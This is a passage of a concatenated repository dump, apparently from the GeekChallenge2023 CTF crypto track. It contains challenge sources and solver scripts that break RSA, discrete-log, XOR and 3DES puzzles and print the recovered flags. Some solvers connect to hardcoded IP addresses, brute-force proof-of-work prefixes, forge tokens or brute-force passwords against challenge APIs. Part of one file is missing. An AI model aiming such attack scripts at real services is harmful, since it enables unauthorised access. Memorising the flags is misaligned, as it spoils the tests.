44589211804350556947586393168468085510624406350243223906451657367443079929310, 11722889880704782579636467834320145727215315468978673105078646852644144267302, 37162938201479628318221670413677559400634057715866847284306714513527750674945, 77991069668341617159462711549869846198981640129981167090704944318704115674, 24781325074095957562937506481915752661363803640103881644858900422306288107594, 50243394436655506401651990642654333034843737321908127591211346146733919698702, 4687442095492726629407063506774869319329506588382547411714227663275278730148, 48665673214235643977327797912745435942206989823180516039539449161268668431974, 74131491413435387119131792722727733759321126020981238229557810802823961991702, 47189904836234956626027292138719309126034135335815370939500027177471882713971, 66642336946744336804106101412855565097025008558851680802487967517455789735556, 39100372733134560391249654613242874470306770053063559688335189061474490770670, 36297514610067901982629018660863166180382473936564037667028601317491991540860, 17324149473313481441270662400440503406969190628735911302837720385800561684540, 42802542236449653261447468311512525596146034881422362728317294020745706813252, 25651626139042609821274522801014495194664487121861815773466154842331285580014, 21716541386578074685869691456061206430285733782385055679840762260951476166122, 25118740227793068650697511146427922183350190031672179227128187181026982602852, 6303338362653191359429840875638154590221214529554254398020317282924083430797, 11676823602923092202726518487432133136153160175716928324653897909896417377812, 22591527842537341294483145138410804137744418275229475690901502775329143898600, 15423465169192480181442356594804980261283721927836152132025601291491315262217, 52812609311392879213822230880621473875352775152002161311612738871397605863880, 21901474529203951179264708005591369522295919484211247102532107112869116078257, 19797638480369991652756574723879513200654975293893348736030544826044791556948, 32988016865606803311065174911158930953616176692859261085994695731044998880154, 15013720620266503710552310356736760039787771152262419663931415383640959944255, 53402948699555555850235236503365318293878053556599845866304850886181009545872, 578414726576963854876846913955619952112582994566716072456132976959884676179, 40466349321388782370223373531538345659737923443566152352256589514853112352198, 1880872771817929401422746887732401444754320797361077742359254586522061791227, 12047247386203611116264496398473894119847278156533141745303654172096885251156, 69936255505090807483097726275462417694819398874749133254493672186121798377200, 56189742534184179404452653989780779218184322976165328587052998625929343322623, 52236009337040761579658737818262052113202727822428351125061965646336627100741, 69602156301479647575919598967688239987914479074743572725062043540490654070257, 43275610870271333523729921390330711657817760080756599441857535230607760941411, 74801842670674570366950941554414694286416981233096278329410936531267480474569, 45523293713799774297869620313627743054021694164918818578543266334503113411324, 6224628148872498105530232773778180856237282756455349012259772098459006806701, 56101098821863605404331255553131939303182353871414861601368987041137915588237, 62514080568984452192743867809516234273763360672588340116364253250870707318521, 19649775237337628583259267760455078900133044996026852089604162480150727282031, 2681234746190183559749527177265047256319920111047263024620018491184772138292, 72477724874088708435244260512231062708354748933432591378948353186584708518437, 30252634827911264412522143493887618347186344100498154681798239667087055584973, 62928841586820277215525270906650454728386236998562125216494201758368148279508, 56211379382238646600328517905522392005714296756819673058449743612932975181011, 50094037173696920599812572028124311773584583077682555863904810763866337865415, 35317166218591202676897548502174130503664049068075924052208958517407974181419, 25506065854504640436633838443529482237490038072404045113454162320518595298079, 24598282043408933159434555506241937793897636834036366695267201954251938064858, 40359136257256317951754486181700633715943232386029795075349229741392377893448, 41753903921049595397751509756734177717249754689414242359419638438895614782681, 64879894430542426137516569367284410206800804149311771326329785080288758261071, 31682887186457559477375016497207344351697184042518871050776477362607703713335, 29968228072586790097820746477232816665998277976293252190030364133538849649097, 332255312561919030611963580501150855624827653577824313728984209608512608771, 33823033061488824234179656069812811550521458222627846709618871103804433549208, 40256197078476374288168370733269644672544776862251441956395184831531034573120, 63854791069720406920587264743813005867085205938858782942089091387745143688524, 9599189722183226358779095857498561886058642596617187395926371060462688656609, 15029540387621509138061041056904048961380890903724088755367710335622982174182, 4834678835879134834601247929812861614226805889003245637987605009945117449222, 49032287443959922585421022539339859727864184118407327061056787486660050994804, 51367113126213677371544088617641070281761594598856355289598680348862100934405, 48099687480283705985883062779219537419919474724954533559850612088090057306918, 55520602086715679118869322729503627581286641464273224324645023518549139088388, 50455510074969331802134040882996226109444134111548070407754215749016079079591, 47469806992474607142964806583892893209350327489840529459975202523406918697529, 44993893961585674228825543823064277790256859558754760867449903789983284056192, 44122596973664102569554815809415734634633243724572865236160697307096168452789, 51722296980185400816766674111348260571814278086142919892660507537043249830719, 2033567717312718757627805714157011922823676173550156447506958538133031286918, 40903326746018205875236484413558515226676475499740080681613680228360211918942, 45655754955370338497959237080418596437202658977517625068449957735452901887933, 13099233879696255324623677988804870917874154288631096861534955732046228968134, 44471530296771048523910819473361036714610802054279177471367823293743719275909, 25446261500563608722277325170677124816913924327250182158338980791838121166348, 20849472122256100875237011040249343324234928290319054354358242725759352931027, 7037043514495750961085179755568922433574397862705004833537643401449768094927, 24602719773333598554726432771595598259193579434836329001621386950000691219145, 18291650246498286332477867018368277382676465438496649012143967117655345637528, 45539989423554662584586894487111357151994014405213908150771179299468367899190, 48070107064454632531764035109162049005752680792201710661207400175358438021031, 7593113852866099746235678251926660680184416554718335029164595384991677535670, 61267284459965876196585417165926198770265833151343328469624242730879803451439, 3113616736283221407577816039505851478576505404761990976205583322559028256017, 29330053766980680089057055489775792668017015563299551837945432855633479513403, 38650331327684731179494096039889807053556745918527992295694445248090022667695, 11185985969572649911287822641562854469066291745462641774733857682450748347757, 6571676849591061846860086681136363771968700745359806059302040914080951597505, 47756994940258770519162165424758057472757403664170491681038228297319879170179, 32594475773547428735290676052531964976552484974356093150173758902449423156454, 31898634435507821969130133343503506337057311382300091683049093677942058183477, 8353498532203907327130477695937160917023156103120835230016413595452591896676, 72216190258743114705738161722736218780580609507689664769226245468683927077534, 70887162563386966001868090323354098874355491350818633411742235015483133077695, 53428119825008762677728594318441425057537661648075595012957502970943136262892, 32863943200860906581953022085708385110199346863351756782360531422328330178353, 69608025594463019257125425333532340909708104310858865262120126307135308366029, 33452066316790958427311031033544525015058584636612574435078141485268045480510, 67467748971757982782108778816344194052265871654600993221694391564870705065723, 4109223118757802968784775933084268418756424413308874230869847907255969302298, 874689888905623826173288368495929100158181002920189916388429819486644481023, 72378176399887630170201236756088580064855288788646391253391062547296108569964], 'c': [53988415223839046381660672886792550892557190087087742629543368068682997090947, 21920921577840820689544269317401273370645213368453408007695580910149937697350, 29475771140129436159914858194223947593631108556842828359576509962355002130884, 31590148131791243731394919647376320328981021184223344832519185603844396786591, 40158574856962337545114912732379830254905090560850444592715018068912713975950, 50202503631530908716292345385552528345477433154392551391113477385703155787943, 25774597836388201526898377602793037428257024917440689218589384298072305574879, 63699495213620446235153554941891496976361246452059711453175708378318694602997, 20163212118036162236820095294493608896188807674678722559179017053183514140545, 19274318563716163915370869155502529679348083562418954598176006625003116718683, 61195117146757818795182876923087120232550209256816533077870026077903026793552, 64135143979846412750088422623420891325395709280682206900910074454563319174684, 21787908653560434902963868824798375507100016805476198412260169885990367978999, 8441422610194193525495290892888645173453076691768846248230542826479457290786, 24175440953264371229111128918926940451898832762196824660170198350642339016663, 59119734184764887826210301129920567765450070009167528626807613085641307427339]} -------------------------------------------------------------------------------- /Crypto/Algebra/task.sage: -------------------------------------------------------------------------------- 1 | #utf-8 2 | #sage 3 | 4 | 5 | import os 6 | from Crypto.Util.number import * 7 | from Crypto.Util.Padding import pad 8 | from secret import flag,e 9 | from functools import reduce 10 | 11 | assert reduce(lambda x,y:x&y,[i^3 - 10*i^2 + 31*i - 30==0 for i in e]) 12 | 13 | LEN = 32 14 | flag = pad(flag,36) 15 | 16 | def LongArray(t:list): 17 | return [bytes_to_long(t[i]) for i in range(len(t))] 18 | 19 | def BytesArray(t:list): 20 | return [long_to_bytes(t[i]) for i in range(len(t))] 21 | 22 | def xor(a, b): 23 | return bytes([a[i%len(a)] ^^ b[i%len(b)] for i in range(max(len(a), len(b)))]) 24 | 25 | def ArrayXor(a:list,b:bytes): 26 | return [xor(a[i],b) for i in range(len(a))] 27 | 28 | def scissors(flag:bytes): 29 | return [flag[i:i+len(flag)//3] for i in range(0, len(flag), len(flag)//3)] 30 | 31 | def challenge(m: bytes, bits: int, level: int): 32 | p = getPrime(bits) 33 | M = random_matrix(Zmod(p), LEN).matrix_from_rows_and_columns(range(LEN), range(LEN-level)) 34 | c = vector(GF(p), m) * M 35 | return {"p": p, "M": M.list(), "c": c.list()} 36 | 37 | def groebner_challenge(m,e): 38 | p = getPrime(1024) 39 | s = sum(m) 40 | c = [pow(m[i],e[i],p) for i in range(3)] 41 | c.insert(0,s) 42 | c.insert(0,p) 43 | return c 44 | 45 | key = os.urandom(LEN) 46 | Get_key = challenge(key,256,0x10) 47 | 48 | S_bytes = scissors(flag) 49 | C_bytes = ArrayXor(S_bytes,key) 50 | C_long = LongArray(C_bytes) 51 | 52 | groebner_challenge = groebner_challenge(C_long,e) 53 | 54 | with open('keyTask.chall', 'w') as f: 55 | f.write(f"{Get_key}") 56 | 57 | with open('groebnerTask.chall','w') as f: 58 | f.write(f"{groebner_challenge}") 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /Crypto/Diligent_Liszt/Diligent_Liszt.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/Diligent_Liszt/Diligent_Liszt.zip -------------------------------------------------------------------------------- /Crypto/Diligent_Liszt/exp.py: -------------------------------------------------------------------------------- 1 | from sage.all import * 2 | import hashlib 3 | from functools import reduce 4 | from gmpy2 import gcd 5 | from Crypto.Util.number import * 6 | Num=3 7 | g = 3 8 | p = 1068910928091265978478887270179608140018534288604159452828300604294675735481804963679672853224192480667904101881092533866322948043654533322038484907159945421 9 | q = 1711302770747802020613711652777299980542669713888988077474955896217408515180094849053961025086865697904731088087532944829046702427480842253022459937172565651 10 | r = 132969813572228739353704467775972551435751558645548804253458782569132362201099158857093676816706297676454547299888531536236748314013888413096371966359860637 11 | y = 5385116324746699759660077007129548063211490907227715474654765255668507958312745677683558789874078477569613259930365612562164095274660123330458355653249805062678976259429733060364358954180439218947514191603330532117142653558803034110759332447742304749985874760435453594107494324797235909651178472904825071375135846093354526936559640383917210702874692725723836865724807664892994298377375580807917514349966834376413176898806591411038129330967050554114677719107335006266 12 | 13 | ps = [p,q,r] 14 | m = [_-1 for _ in ps] 15 | a = [] # x = xi(mod pi-1) 16 | 17 | for _ in ps: 18 | G = GF(_) 19 | g_,y_ = G(g),G(y) 20 | x = int(discrete_log(y_,g_)) 21 | a.append(x) 22 | 23 | gbs=reduce(lambda x,y: x*y//gcd(x,y), m)#最小公倍数 24 | p = reduce(lambda x,y: x*y, m) 25 | def egcd(a, b): 26 | if a == 0: 27 | return (b, 0, 1) 28 | else: 29 | g, y, x = egcd(b % a, a) 30 | return (g, x - (b // a) * y, y) 31 | def china(num): 32 | m1,a1,lcm=m[0],a[0],m[0] 33 | for i in range(1,num): 34 | m2=m[i] 35 | a2=a[i] 36 | c=a2-a1 37 | g,k1,k2=egcd(m1,m2) 38 | lcm=lcm*m[i]//gcd(lcm,m[i]) 39 | if c%g : 40 | print('No Answer!') 41 | return 0 42 | x0=c//g*k1 43 | t=m2//g 44 | x0=(x0%t+t)%t 45 | a1+=m1*x0 46 | m1=m2//g*m1 47 | return a1 48 | ans=china(Num) 49 | i=0 50 | x=ans+i*gbs 51 | while x').split(b'\n') 49 | print(m) 50 | if not m[-2].startswith(b'Give') and not m[-3].startswith(b'('): 51 | exit() 52 | abp = chr(m[-2][-3]) 53 | pts = "["+m[-3].decode()+"]" 54 | print(abp,pts) 55 | 56 | set = solve(pts) 57 | a,b,p = set 58 | rec.sendline(str(eval(abp)).encode()) 59 | 60 | 61 | for _ in range(9): 62 | m = b"".join(rec.recvline() for _ in range(6)).split(b'\n') 63 | print(m) 64 | abp = chr(m[-2][-3]) 65 | pts = "["+m[-3].decode()+"]" 66 | set = solve(pts) 67 | a,b,p = set 68 | rec.sendlineafter(b">",str(eval(abp)).encode()) 69 | 70 | 71 | print(rec.recvall()) 72 | 73 | 74 | # b" Good! Next challenge->\n\n||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\nCongrats! Your flag is: b'SYC{ECC_M4ster}'\n" -------------------------------------------------------------------------------- /Crypto/EzComplex/task.py: -------------------------------------------------------------------------------- 1 | #sage9.3 2 | from Crypto.Util.number import * 3 | flag = b'FAKE{Do_You_know_Complex_numbers}' 4 | p = random_prime(1 << 384) 5 | q = random_prime(1 << 384) 6 | n = p * q 7 | e = 0x10001 8 | N = pow(p, 2) + pow(q, 2) 9 | m = bytes_to_long(flag) 10 | c = pow(m,e,n) 11 | 12 | 13 | print(c) 14 | print(N) 15 | 16 | ''' 17 | 122977267154486898127643454001467185956864368276013342450998567212966113302012584153291519651365278888605594000436279106907163024162771486315220072170917153855370362692990814276908399943293854077912175867886513964032241638851526276 18 | 973990451943921675425625260267293227445098713194663380695161260771362036776671793195525239267004528550439258233703798932349677698127549891815995206853756301593324349871567926792912475619794804691721625860861059975526781239293017498 19 | ''' 20 | -------------------------------------------------------------------------------- /Crypto/GoGoCrypto/GoGoCrypto_setup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/GoGoCrypto/GoGoCrypto_setup.zip -------------------------------------------------------------------------------- /Crypto/GoGoCrypto/exp.py: -------------------------------------------------------------------------------- 1 | import os 2 | from urllib.parse import unquote 3 | from base64 import b64decode as dec, b64encode as enc 4 | from pwn import xor 5 | import requests 6 | from hashlib import sha512 7 | 8 | def curl_request(url, method='GET', headers=None, data=None): 9 | try: 10 | if method.upper() == 'GET': 11 | response = requests.get(url, headers=headers) 12 | elif method.upper() == 'POST': 13 | response = requests.post(url, headers=headers, data=data) 14 | elif method.upper() == 'PUT': 15 | response = requests.put(url, headers=headers, data=data) 16 | elif method.upper() == 'DELETE': 17 | response = requests.delete(url, headers=headers, data=data) 18 | else: 19 | print("Unsupported HTTP method") 20 | return None 21 | 22 | # 检查请求是否成功 23 | response.raise_for_status() 24 | 25 | return response.text 26 | except requests.exceptions.RequestException as e: 27 | print(f"Error: {e}") 28 | return None 29 | url = 'http://47.109.106.62:7842/' 30 | response = requests.get(url) 31 | x = str(response.headers) 32 | 33 | token = unquote(x.split("token")[1].split(";")[0][1:]) 34 | token = dec(token) 35 | nonce = unquote(x.split("nonce")[1].split(";")[0][1:]) 36 | 37 | c1, c2 = token[:len(token)//2], token[len(token)//2:] 38 | c1 = xor(xor(c1,b'\x10'*16),b'\x1f'*16) 39 | 40 | form_data = { 41 | "Rec": enc(c1+c2).decode() 42 | } 43 | res = curl_request('http://47.109.106.62:7842/api/dec', method='POST', headers=None, data=form_data) 44 | print(res) 45 | 46 | for i in range(256): 47 | form_data = { 48 | "Password": enc(chr(i).encode()).decode()+enc(sha512(dec(nonce)).digest()).decode() 49 | } 50 | res = curl_request('http://47.109.106.62:7842/api/check', method='POST', headers=None, data=form_data) 51 | if "SYC" in str(res): 52 | print(res) 53 | break 54 | # {"check":"true","msg":"Your flag is: SYC{AL3XEI_FAKE_FLAG}"} -------------------------------------------------------------------------------- /Crypto/JPGDiff/JPGDiff.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/JPGDiff/JPGDiff.zip -------------------------------------------------------------------------------- /Crypto/JPGDiff/exp.py: -------------------------------------------------------------------------------- 1 | import PIL.Image 2 | from hilbertcurve.hilbertcurve import HilbertCurve 3 | p,n = 256,2 4 | ct = PIL.Image.open(r'ct.png').convert('RGB') 5 | print(ct.width,ct.height) 6 | 7 | pt = PIL.Image.new('RGB',(p,p)) 8 | print('step2') 9 | hilbert_curve = HilbertCurve(p,n) 10 | distances = list(range(p**2)) 11 | points = hilbert_curve.points_from_distances(distances) 12 | print('step3') 13 | for point, dist in zip(points, distances): 14 | x,y = point 15 | print(x,y) 16 | pix = ct.getpixel((0,dist)) 17 | pt.putpixel((x,y),pix) 18 | 19 | pt.save(r'pt1.png') -------------------------------------------------------------------------------- /Crypto/Just need One/Just need One_setup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/Just need One/Just need One_setup.zip -------------------------------------------------------------------------------- /Crypto/Just need One/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from Crypto.Util.number import * 3 | from hashlib import sha256 4 | from itertools import product 5 | import string 6 | 7 | 8 | table = string.ascii_letters+string.digits 9 | rec = remote('59.110.20.54', int(2613)) 10 | 11 | 12 | 13 | 14 | _ = rec.recvuntil(b'XXXX:') 15 | print(_) 16 | tail,h = _[12:28],_[33:97] 17 | print(tail,h) 18 | for head in product(table,repeat=4): 19 | m = "".join(head)+tail.decode() 20 | h_ = sha256(m.encode()) 21 | if h_.hexdigest() == h.decode(): 22 | print('find!') 23 | break 24 | rec.sendline("".join(head).encode()) 25 | 26 | rec.sendlineafter(b'>',str(int(2**32-1)).encode()) 27 | 28 | res = int(rec.recvline().decode()) 29 | ans = "" 30 | for _ in range(128): 31 | ans+=str((res//((2**32-1)**_))%(2**32-1))+"," 32 | ans = ans[:-1] 33 | rec.sendlineafter(b'>',ans.encode()) 34 | print(rec.recvline()) 35 | 36 | # b' Congrats! Your flag is: SYC{Alg0r1thm_1s_s0_S1mpl3!}\n' -------------------------------------------------------------------------------- /Crypto/OTPTwice/OTPTwice.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/OTPTwice/OTPTwice.zip -------------------------------------------------------------------------------- /Crypto/OTPTwice/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import xor 2 | 3 | c1=b'\xdbi\xab\x8d\xfb0\xd3\xfe!\xf8Xpy\x80w\x8c\x87\xb9' 4 | c2=b'o\xb0%\xfb\xdb\x0e\r\x04\xde\xd1\x9a\x08w\xda4\x0f\x0cR' 5 | c3=b'\xe7\x80\xcd\ria\xb2\xca\x89\x1a\x9d;|#3\xf7\xbb\x96' 6 | 7 | print(xor(xor(c1,c2),c3)) 8 | # b'SYC{I_l0v3_Crypt0}' -------------------------------------------------------------------------------- /Crypto/OldAlgorithm/OldAlgorithm.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/OldAlgorithm/OldAlgorithm.zip -------------------------------------------------------------------------------- /Crypto/OldAlgorithm/exp.sage: -------------------------------------------------------------------------------- 1 | from sage.all import * 2 | from Crypto.Util.number import * 3 | p= [58657, 47093, 47963, 41213, 57653, 56923, 41809, 49639, 44417, 38639, 39857, 53609, 55621, 41729, 60497, 44647, 39703, 55117, 44111, 57131, 37747, 63419, 63703, 64007, 46349, 39241, 39313, 44909, 40763, 46727, 34057, 56333] 4 | c= [36086, 4005, 3350, 23179, 34246, 5145, 32490, 16348, 13001, 13628, 7742, 46317, 50824, 23718, 32995, 7640, 10590, 46897, 39245, 16633, 31488, 36547, 42136, 52782, 31929, 34747, 29026, 18748, 6634, 9700, 8126, 5197] 5 | a = crt(c,p) 6 | print(long_to_bytes(a)) 7 | #b'SYC{CRT_1s_s0_ju1cy!}]mC\x9c\xf9C/\xfc\xb8t\x16' 8 | -------------------------------------------------------------------------------- /Crypto/PolyRSA/PolyRSA.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/PolyRSA/PolyRSA.zip -------------------------------------------------------------------------------- /Crypto/PolyRSA/exp.py: -------------------------------------------------------------------------------- 1 | import gmpy2 as gp 2 | from Crypto.Util.number import * 3 | e1= 113717 4 | e2= 80737 5 | c1= 97528398828294138945371018405777243725957112272614466238005409057342884425132214761228537249844134865481148636534134025535106624840957740753950100180978607132333109806554009969378392835952544552269685553539656827070349532458156758965322477969141073720173165958341043159560928836304172136610929023123638981560836183245954461041167802574206323129671965436040047358250847178930436773249800969192016749684095882580749559014647942135761757750292281205876241566597813517452803933496218995755905344070203047797893640399372627351254542342772576533524820435965479881620338366838326652599102311019884528903481310690767832417584600334987458835108576322111553947045733143836419313427495888019352323209000292825566986863770366023326755116931788018138432898323148059980463407567431417724940484236335082696026821105627826117901730695680967455710434307270501190258033004471156993017301443803372029004817834317756597444195146024630164820841200575179112295902020141040090350486764038633257871003899386340004440642516190842086462237559715130631205046041819931656962904630367121414263911179041905140516402771368603623318492074423223885367923228718341206283572152570049573607906130786276734660847733952210105659707746969830132429975090175091281363770357 6 | c2= 353128571201645377052005694809874806643786163076931670184196149901625274899734977100920488129375537186771931435883114557320913415191396857882995726660784707377672210953334914418470453787964899846194872721616628198368241044602144880543115393715025896206210152190007408112767478800650578941849344868081146624444817544806046188600685873402369145450593575618922226415069043442295774369567389939040265656574664538667552522329712111984168798829635080641332045614585247317991581514218486004191829362787750803153463482021229058714990823658655863245025037102127138472397462755776598314247771125981017814912049441827643898478473451005083533693951329544115861795587564408860828213753948427321483082041546722974666875065831843384005041800692983406353922680299538080900818930589336142421748023025830846906503542594380663429947801329079870530727382679634952272644949425079242992486832995962516376820051495641486546631849426876810933393153871774796182078367277299340503872124124714036499367887886486264658590613431293656417255355575602576047502506125375605713228912611320198066713358654181533335650785578352716562937038768171269136647529849805172492594142026261051266577821582011917001752590659862613307646536049830151262848916867223615064832279222 7 | c= 375617816311787295279632219241669262704366237192565344884527300748210925539528834207344757670998995567820735715933908541800125317082581328287816628816752542104514363629022246620070560324071543077301256917337165566677142545053272381990573611757629429857842709092285442319141751484248315990593292618113678910350875156232952525787082482638460259354559904243062546518553607882194808191571131590524874275187750985821420412987586148770397073003186510357920710387377990379862185266175190503647626248057084923516190642292152259727446111686043531725993433395002330208067534104745851308178560234372373476331387737629284961288204368572750848248186692623500372605736825205759172773503283282321274793846281079650686871355211691681512637459986684769598186821524093789286661348936784712071312135814683041839882338235290487868969391040389837253093468883093296547473466050960563347060307256735803099039921213839491129726807647623542881247210251994139130146519265086673883077644185971830004165931626986486648581644383717994174627681147696341976767364316172091139507445131410662391699728189797082878876950386933926807186382619331901457205957462337191923354433435013338037399565519987793880572723211669459895193009710035003369626116024630678400746946356 8 | n= 728002565949733279371529990942440022467681592757835980552797682116929657292509059813629423038094227544032071413317330087468458736175902373398210691802243764786251764982802000867437756347830992118278032311046807282193498960587170291978547754942295932606784354258945168927044376692224049202979158068158842475322825884209352566494900083765571037783472505580851500043517614314755340168507097558967372661966013776090657685241689631615245294004694287660685274079979318342939473469143729494106686592347327776078649315612768988028622890242005700892937828732613800620455225438339852445425046832904615827786856105112781009995862999853122308496903885748394541643702103368974605177097553007573113536089894913967154637055293769061726082740854619536748297829779639633209710676774371525146758917646731487495135734759201537358734170552231657257498090553682791418003138924472103077035355223367678622115314235119493397080290540006942708439607767313672671274857069053688258983103863067394473084183472609906612056828326916114024662795812611685559034285371151973580240723680736227737324052391721149957542711415812665358477474058103338801398214688403784213100455466705770532894531602252798634923125974783427678469124261634518543957766622712661056594132089 9 | 10 | 11 | 12 | e = 65537 13 | t1 = (gp.powmod(c1,e2,n)*gp.powmod(5,e1*e2,n))%n 14 | t2 = (gp.powmod(c2,e1,n)*gp.powmod(2,e1*e2,n) )%n 15 | p = gp.gcd((t1-t2)%n,n) 16 | assert n%p == 0 17 | q = n//p 18 | d = gp.invert(e,(p-1)*(q-1)) 19 | m = gp.powmod(c,d,n) 20 | print(long_to_bytes(m)) 21 | # b"SYC{poly_rsa_Just_need5_s1mple_gcd}" -------------------------------------------------------------------------------- /Crypto/Quick_Robert/Quick_Robert_setup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/Quick_Robert/Quick_Robert_setup.zip -------------------------------------------------------------------------------- /Crypto/Quick_Robert/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from Crypto.Util.number import * 3 | from hashlib import sha256 4 | from itertools import product 5 | from gmpy2 import legendre as leg 6 | 7 | def s1(set): 8 | p,a,b,c = set 9 | if (b**2-4*a*c)%p !=0: 10 | return -leg(a,p) 11 | else: 12 | return leg(a,p)*(p-1) 13 | 14 | 15 | 16 | key = b'FEFEFEFEFEFEFEFE' 17 | table = string.ascii_letters+string.digits 18 | 19 | 20 | rec = remote('59.110.20.54', 3042) 21 | _ = rec.recvuntil(b'XXXX:') 22 | ''' 23 | sha256(XXXX+duk9TfBbBkPtgm89) == 668113cd526a0998b14263b4a2f144ba435d11e7c497fd8da88cf23297cbaabd 24 | Give me XXXX: abcd 25 | 26 | ''' 27 | tail,h = _[12:28],_[33:97] 28 | for head in product(table,repeat=4): 29 | m = "".join(head)+tail.decode() 30 | h_ = sha256(m.encode()) 31 | if h_.hexdigest() == h.decode(): 32 | print('find!') 33 | break 34 | rec.sendline("".join(head).encode()) 35 | 36 | 37 | m = rec.recvuntil(b'>').split(b'\n') 38 | abc,p = m[-4].split(b' '),m[-3].split(b' ') 39 | print(abc) 40 | print(p) 41 | a,b,c,p = int(abc[0].decode()), int(abc[4].decode()), 1, int(p[2].decode()) 42 | set = (p,a,b,c) 43 | res = s1(set) 44 | print("rec = {}".format(res)) 45 | 46 | 47 | rec.sendline(str(res).encode()) 48 | 49 | try: 50 | while True: 51 | m = rec.recvuntil(b'>') 52 | m = rec.recvuntil(b'>').split(b'\n') 53 | abc,p = m[-4].split(b' '),m[-3].split(b' ') 54 | print(abc) 55 | print(p) 56 | a,b,c,p = int(abc[0].decode()), int(abc[4].decode()), 1, int(p[2].decode()) 57 | set = (p,a,b,c) 58 | res = s1(set) 59 | print("rec = {}".format(res)) 60 | 61 | 62 | rec.sendline(str(res).encode()) 63 | except: 64 | rec.interactive() 65 | 66 | 67 | # Congrats! Your flag is: b'SYC{G00d!_u_4r3_Qu33n_0f_Quadratic}' -------------------------------------------------------------------------------- /Crypto/Quick_Robert/pandey14.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/Quick_Robert/pandey14.pdf -------------------------------------------------------------------------------- /Crypto/SignIn/exp.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | 3 | a = 0x5359437b48656c6c6f5f576f726c645f43727970746f5f6269626f6269626f7d 4 | print(long_to_bytes(a)) 5 | 6 | # b'SYC{Hello_World_Crypto_bibobibo}' -------------------------------------------------------------------------------- /Crypto/Simple3DES/Simple3DES_setup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/Simple3DES/Simple3DES_setup.zip -------------------------------------------------------------------------------- /Crypto/Simple3DES/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from Crypto.Util.number import * 3 | from hashlib import sha256 4 | from itertools import product 5 | import string 6 | key = b'340282366920938463444927863358058659840' 7 | table = string.ascii_letters+string.digits 8 | rec = remote('59.110.20.54', 23333) 9 | _ = rec.recvuntil(b'XXXX:') 10 | ''' 11 | sha256(XXXX+duk9TfBbBkPtgm89) == 668113cd526a0998b14263b4a2f144ba435d11e7c497fd8da88cf23297cbaabd 12 | Give me XXXX: abcd 13 | 14 | ''' 15 | tail,h = _[12:28],_[33:97] 16 | for head in product(table,repeat=4): 17 | m = "".join(head)+tail.decode() 18 | h_ = sha256(m.encode()) 19 | if h_.hexdigest() == h.decode(): 20 | print('find!') 21 | break 22 | rec.sendline("".join(head).encode()) 23 | rec.sendlineafter(b'>',b'2') 24 | rec.sendlineafter(b'>',key) 25 | ct = rec.recvline()[1:-1] 26 | rec.sendlineafter(b'>',b'1') 27 | rec.sendlineafter(b'>',ct) 28 | rec.sendlineafter(b'>',key) 29 | pt = rec.recvline()[1:-1] 30 | print(long_to_bytes(int(pt))) 31 | 32 | rec.close() 33 | # b'SYC{DES_1s_0ut_0f_t1me}\xe1\x92z${S\x08\x7fm''' 34 | 35 | -------------------------------------------------------------------------------- /Crypto/SimpleRSA/SimpleRSA.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SycloverTeam/GeekChallenge2023/21394b9dffca06c3a78b3d37f991ec30351ca82e/Crypto/SimpleRSA/SimpleRSA.zip -------------------------------------------------------------------------------- /Crypto/SimpleRSA/exp.py: -------------------------------------------------------------------------------- 1 | import gmpy2 as gp 2 | from Crypto.Util.number import * 3 | p=24724324630507415330944861660078769085865178656494256140070836181271808964994457686409910764936630391300708451701526900994412268365698217113884698394658886249353179639767806926527103624836198494439742123128823109527320850165486500517304731554371680236789357527395416607541627295126502440202040826686102479225702795427693781581584928770373613126894936500089282093366117940069743670997994742595407158340397268147325612840109162997306902492023078425623839297511182053658542877738887677835528624045235391227122453939459585542485427063193993069301141720316104612551340923656979591045138487394366671477460626997125944456537 4 | c=51034566171845037563230476481972422382401860935996425950376228325335001016151519091215262360401909326696709584733438828139040683158766325316425654390569402195221122065282022552741386120845276021576782892703989343552857214828252919877377286425506121320827999901119495214636274848510303214980653814069353736175521017669889510470837940080651190771990486706886597024120880661506105504725402611801683675028396647810398737536182619893052946226101332490452201480450258286571644182889504755004140117212712974996950785335553119781491960396366464622050567230254308595937267939571789206024546146486150716427644214040730883253770745072943222415075460351852628876710568239919043868008592507805145944861872587124956301186452558587018812372555441165504415299482605690050229877280213352659179432822493240568058375730706439579231738357186661958297437734473693027155416070147838576342609109168649678899958834041922678521702850468454219797038791626212627895527852345290304331645282573803064510027159594265249885250666078960584630960234393224543542142567305823878550928036622975440494921966304362743143775508785550213989063946848192278897382178395776643385